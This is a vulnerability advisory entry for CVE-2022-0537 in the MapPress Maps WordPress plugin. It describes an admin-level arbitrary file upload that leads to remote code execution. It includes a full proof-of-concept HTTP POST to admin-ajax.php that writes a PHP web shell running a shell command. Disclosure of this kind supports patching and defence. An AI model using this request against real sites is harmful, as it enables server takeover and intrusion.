Lucene search
QerogramWPEX-ID:ABFBBA70-5158-4990-98E5-F302361DB367HistoryMar 14, 2022 - 12:00 a.m.
MapPress Maps for WordPress < 2.73.13 - Admin+ File Upload to Remote Code Execution
2022-03-1400:00:00
qerogram
88
mappress
wordpress
file upload
remote code execution
vulnerability
web shell
server access
EPSS
0.001
Percentile
42.0%
The plugin allows a high privileged user to bypass the DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS settings and upload arbitrary files to the site through the “ajax_save” function. The file is written relative to the current theme’s stylesheet directory, and a .php file extension is added. No validation is performed on the content of the file, triggering an RCE vulnerability by uploading a web shell. Further the name parameter is not sanitized, allowing the payload to be uploaded to any directory to which the server has write access.
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 329
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost:8000/wp-admin/admin.php?page=mappress_maps
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: [admin+]
action=mapp_tpl_save&mapdata=%7B%22center%22%3Anull%2C%22height%22%3Anull%2C%22mapid%22%3Anull%2C%22mapTypeId%22%3Anull%2C%22metaKey%22%3Anull%2C%22pois%22%3A%5B%5D%2C%22postid%22%3A0%2C%22search%22%3Anull%2C%22title%22%3Anull%2C%22width%22%3Anull%2C%22zoom%22%3Anull%7D&nonce=9fe04b45b4&name=zero.cgi&content=<?php+echo(`ls`);?>Related
cve
cve
CVE-2022-0537
2022-04-04 16:15:09
cnvd
cnvd
WordPress MapPress Maps plugin authorization problem vulnerability
2022-04-07 00:00:00
wpvulndb
wpvulndb
cvelist
cvelist
patchstack
patchstack
prion
prion
Design/Logic Flaw
2022-04-04 16:15:00
nvd
nvd
CVE-2022-0537
2022-04-04 16:15:09